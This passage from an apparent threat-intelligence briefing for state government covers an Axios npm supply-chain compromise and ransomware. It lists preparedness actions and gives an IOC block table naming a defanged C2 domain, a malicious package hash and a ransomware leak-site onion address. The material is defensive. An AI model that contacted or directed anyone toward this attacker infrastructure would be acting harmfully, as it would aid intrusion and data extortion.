Preparedness</strong></h3> <table> <thead> <tr> <th> <p>Action</p> </th> <th> <p>Owner</p> </th> <th> <p>Timeframe</p> </th> </tr> </thead> <tbody> <tr> <td> <p>Brief the CIO and agency heads on the Axios supply chain risk &mdash; this affects citizen-facing applications and requires cross-agency coordination</p> </td> <td> <p>CISO</p> </td> <td> <p>Immediate</p> </td> </tr> <tr> <td> <p>Confirm incident response retainer is active and the IR provider has current network diagrams and contact information</p> </td> <td> <p>CISO</p> </td> <td> <p>7-Day</p> </td> </tr> <tr> <td> <p>Pre-authorize emergency patching windows for critical vulnerabilities without standard change control delays</p> </td> <td> <p>CIO</p> </td> <td> <p>7-Day</p> </td> </tr> <tr> <td> <p>Review cyber insurance policy for supply chain compromise and ransomware coverage adequacy</p> </td> <td> <p>CISO / Legal / Risk</p> </td> <td> <p>30-Day</p> </td> </tr> <tr> <td> <p>Establish communication protocol with CISA Region and MS-ISAC for coordinated response if a state agency is compromised via any of the active campaigns</p> </td> <td> <p>CISO</p> </td> <td> <p>7-Day</p> </td> </tr> </tbody> </table> <h2><strong>IOC Blocking Table&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</strong></h2> <p>The following IOCs have been verified through intelligence collection and may be used for immediate blocking and detection:</p> <table> <thead> <tr> <th> <p>Type</p> </th> <th> <p>Value</p> </th> <th> <p>Context</p> </th> <th> <p>Action</p> </th> </tr> </thead> <tbody> <tr> <td> <p>Domain</p> </td> <td> <p>sfrclak[.]com</p> </td> <td> <p>Axios npm supply chain C2 infrastructure (DPRK/Sapphire Sleet)</p> </td> <td> <p>DNS sinkhole + proxy block</p> </td> </tr> <tr> <td> <p>SHA-1</p> </td> <td> <p>3b8855190bfd44f2fc5f93c31f81646ce2c77f68</p> </td> <td> <p>Malicious Axios package hash (Kaspersky feed, confidence 100)</p> </td> <td> <p>Endpoint detection block</p> </td> </tr> <tr> <td> <p>Domain (pattern)</p> </td> <td> <p>*[.]workers[.]dev</p> </td> <td> <p>Cloudflare Workers used as C2 proxy in related DPRK campaigns</p> </td> <td> <p>Monitor &mdash; do not blanket-block (legitimate use is common); alert on connections from non-browser processes</p> </td> </tr> <tr> <td> <p>Onion</p> </td> <td> <p>ransomocmou6mnbquqz44ewosbkjk3o5qjsl3orawojexfook2j7esad[.]onion</p> </td> <td> <p>Everest ransomware data leak site</p> </td> <td> <p>Network monitoring indicator (Tor exit node detection)</p> </td> </tr> </tbody> </table> <p>Additional IOCs for the campaigns discussed in this report are available through Anomali ThreatStream Next-Gen and partner feeds. MISTBRICK malware hashes have not yet been published in available feeds &mdash; monitor vendor advisories for updates.</p> <h2><strong>Bottom Line&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></h2> <p>The threat environment facing state government has shifted. The days when phishing emails were the primary concern are behind us. Today's adversaries &mdash; North Korean supply chain operators, Iranian infrastructure saboteurs, Russian intelligence services, and ransomware syndicates that explicitly target government &mdash; are exploiting the appliances, software libraries, and management tools that form the backbone of state IT operations.</p> <p>The convergence is the message. A single compromised JavaScript library is simultaneously a supply chain incident, a nation-state operation, and a patch management failure. An unpatched mobile device management server is not just a vulnerability &mdash; it is an invitation to five different threat actor groups. A whitelisted remote support tool is not just convenient &mdash; it is the exact tool a ransomware operator will use to move through your network.</p> <p>Three actions matter most right now:</p> <ol> <li><strong>Patch Ivanti EPMM today.</strong> Not this week. Today. Five campaigns. New malware. Government targets confirmed.</li> <li><strong>Audit Axios dependencies today.</strong> Every state web application. Every package-lock.json. Block sfrclak[.]com at the network edge.</li> <li><strong>Hunt for unauthorized RMM tools today.</strong> AnyDesk, Atera, Splashtop. If they are not on your approved list, they should not be on your network.</li> </ol> <p>The threat actors are not waiting. Neither should we.</p> <p><em>Anomali CTI Desk &mdash; 2026-04-21</em><em>For questions or to request additional intelligence on any topic covered in this briefing, contact your Anomali representative or the CTI Desk directly.</em><em>IOCs and machine-readable indicators are available via Anomali ThreatStream Next-Gen.</em></p>